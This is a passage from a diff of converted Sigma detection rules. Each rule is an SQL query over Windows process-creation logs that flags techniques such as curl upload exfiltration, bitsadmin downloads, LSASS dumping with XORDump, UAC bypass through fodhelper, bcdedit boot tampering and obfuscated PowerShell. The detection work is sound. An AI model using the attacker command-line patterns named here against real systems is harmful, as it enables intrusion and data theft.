%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' 
ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "New Generic Credentials Added Via Cmdkey.EXE", - "id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", - "status": "experimental", - "description": "Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", + "id": "74403157-20f5-415d-89a7-c505779585cf", + "status": "test", + "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use to pass password to different powershell commands" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /g%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_adding_generic_creds.yml" + "filename": 
"proc_creation_win_powershell_cmdline_convertto_securestring.yml" }, { - "title": "File With Suspicious Extension Downloaded Via Bitsadmin", - "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "title": "Suspicious Scheduled Task Creation via Masqueraded XML File", + "id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence", + "author": "Swachchhanda Shrawan Poudel, Elastic (idea)", "tags": [ "attack.defense_evasion", "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036.005", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE 
'%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/create%' ESCAPE '\\' OR CommandLine LIKE '%-create%' ESCAPE '\\') AND (CommandLine LIKE '%/xml%' ESCAPE '\\' OR CommandLine LIKE '%-xml%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%.xml%' ESCAPE '\\') OR (IntegrityLevel = 'System') OR (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%:\\\\WINDOWS\\\\Installer\\\\MSI%' ESCAPE '\\' AND ParentCommandLine LIKE '%.tmp,zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\'))) AND NOT (((ParentProcessName LIKE '%:\\\\ProgramData\\\\OEM\\\\UpgradeTool\\\\CareCenter\\_%\\\\BUnzip\\\\Setup\\_msi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Camera Station\\\\SetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Axis Communications\\\\AXIS Device Manager\\\\AdmSetupActions.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files (x86)\\\\Zemana\\\\AntiMalware\\\\AntiMalware.exe' ESCAPE '\\' OR ParentProcessName LIKE '%:\\\\Program Files\\\\Dell\\\\SupportAssist\\\\pcdrcui.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" + "filename": "proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" }, { - "title": "Suspicious Process Start Locations", - "id": 
"15b75071-74cc-47e0-b4c6-b43744a62a2b", + "title": "Suspicious XOR Encoded PowerShell Command", + "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", "status": "test", - "description": "Detects suspicious process run from unusual locations", - "author": "juju4, Jonhnathan Ribeiro, oscd.community", + "description": "Detects presence of a potentially xor encoded powershell command", + "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" + "attack.execution", + "attack.t1059.001", + "attack.t1140", + "attack.t1027" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE 
'%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_run_locations.yml" + "filename": "proc_creation_win_powershell_xor_commandline.yml" }, { - "title": "Remote File Download via Desktopimgdownldr Utility", - "id": "214641c2-c579-4ecb-8427-0cf19df6842e", - "status": "experimental", - "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", - "author": "Tim Rauch", + "title": "Potential Data Exfiltration Via Curl.EXE", + "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "status": "test", + "description": "Detects the execution of the \"curl\" process with \"upload\" flags. 
Which might indicate potential data exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.exfiltration", + "attack.t1567", "attack.t1105" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" + "filename": "proc_creation_win_curl_fileupload.yml" }, { - "title": "Logon Scripts (UserInitMprLogonScript)", - "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.t1037.001", - "attack.persistence" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "VMToolsd Suspicious Child Process", - "id": "5687f942-867b-4578-ade7-1e341c46e99a", - "status": "experimental", - "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", - "author": "behops, Bhabesh Raj", + "title": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "test", + "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", + "author": "@neu5ron", "tags": [ - "attack.execution", + "attack.defense_evasion", + "attack.t1070", "attack.persistence", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate use by administrator" + "attack.t1542.003" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND (CommandLine LIKE '%delete%' ESCAPE '\\' OR CommandLine LIKE '%deletevalue%' ESCAPE '\\' OR CommandLine LIKE '%import%' ESCAPE '\\' OR CommandLine LIKE '%safeboot%' ESCAPE '\\' OR CommandLine LIKE '%network%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" + "filename": "proc_creation_win_bcdedit_susp_execution.yml" }, { - "title": "Wusa Extracting Cab Files From Suspicious Paths", - "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "description": "Detects commandline containing reference to files 
ending with a \".\" This scheme has been seen used by raspberry-robin", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" 
@@ -17437,3634 +17330,3802 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "Service DACL Abuse To Hide Services Via Sc.EXE", - "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", - "status": "experimental", - "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR 
OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious Rundll32 Execution With Image Extension", - "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", - "status": "experimental", - "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", - "author": "Hieu Tran", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", + "status": "test", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 
'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Remote Access Tool - GoToAssist Execution", - "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m 
dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_pua_runxcmd.yml" }, { - "title": "Suspicious Csc.exe Source File Folder", - "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "title": "Suspicious Kernel Dump Using Dtrace", + "id": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "status": "test", - "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1027.004" - ], "falsepositives": [ - "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", - "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 
'%\\\\dtrace.exe' ESCAPE '\\' AND CommandLine LIKE '%lkd(0)%' ESCAPE '\\') OR (CommandLine LIKE '%syscall:::return%' ESCAPE '\\' AND CommandLine LIKE '%lkd(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_csc_susp_folder.yml" + "filename": "proc_creation_win_dtrace_kernel_dump.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Imports Registry Key From an ADS", + "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "status": "test", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_regedit_import_keys_ads.yml" }, { - "title": "Suspicious Cabinet File Execution Via Msdt.EXE", - "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "status": 
"experimental", - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", + "title": "Potential PowerShell Downgrade Attack", + "id": "b3512211-c67e-4707-bedc-66efc7848863", + "status": "test", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Harish Segar (rule)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".diagcab\" files" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine 